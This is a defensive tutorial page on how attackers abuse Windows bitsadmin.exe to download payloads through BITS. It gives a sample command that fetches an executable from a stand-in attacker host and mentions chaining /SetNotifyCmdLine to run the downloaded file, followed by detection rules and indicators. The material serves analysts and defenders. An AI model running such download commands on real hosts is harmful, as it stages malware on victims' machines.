Skip to content
Reverse Engineering
Living off the Landbeginner

Bitsadmin Download

Attackers abuse the signed bitsadmin.exe to queue background BITS jobs that download payloads under a trusted service, blending into normal updates.

bitsadmin.exe is a signed Windows command-line tool for creating and managing Background Intelligent Transfer Service (BITS) jobs. BITS is the same throttled, resumable transfer mechanism Windows Update and many legitimate installers use, so its traffic is expected on every host. Attackers abuse bitsadmin to queue a download job that fetches a payload over HTTP/S — the transfer is carried out by the BITS service (svchost.exe), not the attacker's process, giving a layer of indirection and persistence.

The technique is attractive because it is simple, uses a trusted Microsoft binary, survives reboots and network interruptions, and can be chained so that the file is executed once the transfer completes. Analysts encounter it during the ingress phase of an intrusion, typically launched from a script or command interpreter to pull staged tooling onto a foothold host.

How it works

The attacker creates a job, adds a remote file to it, and starts the transfer in a single command line:

text
bitsadmin /transfer job1 /download /priority high http://attacker.example/p.exe c:\users\public\p.exe

/transfer ... /download queues and runs the job; the source is a URL and the destination is a user-writable path. Attackers frequently set /priority high to move quickly, and may chain /SetNotifyCmdLine so BITS executes the payload itself when the job finishes — meaning the spawning parent of the malware is the BITS service, not the original script.

The recognisable indicators are bitsadmin combined with /transfer, /download, /addfile, /SetNotifyCmdLine, or /create, paired with an http/https source and an .exe/.dll/.ps1 destination in a writable directory — none of which resemble a normal Windows Update transfer the OS queues on its own.

Detection & analysis

Static analysis:

  • Triage the command line with regex/YARA: bitsadmin plus /transfer, /addfile, /download, or /SetNotifyCmdLine together with a URL and an executable destination is high-signal. The presence of /SetNotifyCmdLine (execute-on-complete) is especially suspicious.
  • BITS jobs are also recorded on disk and in ETW; inspect the Microsoft-Windows-Bits-Client/Operational log and the BITS state for queued jobs referencing external URLs, suspicious destinations, or a notify command line.

Dynamic analysis:

  • In a sandbox, attribute the actual network fetch to the BITS service (svchost.exe hosting BITS) rather than bitsadmin.exe, then capture the URL and the dropped file. Watch for a file written to a user-writable directory followed by its execution.
  • Inspect the process tree around the bitsadmin invocation. Benign use is rare interactively; malicious instances are commonly spawned by cmd.exe, powershell.exe, wscript.exe, or an Office application, and may be followed by execution of the downloaded file via the BITS notify callback.

Detection rule hint:

Alert on Sysmon Event ID 1 where Image ends with \bitsadmin.exe AND the command line contains /transfer, /addfile, /download, or /SetNotifyCmdLine (especially with an http/https source or an .exe/.dll/.ps1 destination). Correlate with the BITS-Client Operational log and with Event ID 11 (file create) under the same destination path, and treat bitsadmin spawned by a script host or Office app as anomalous.

Votes

Comments(0)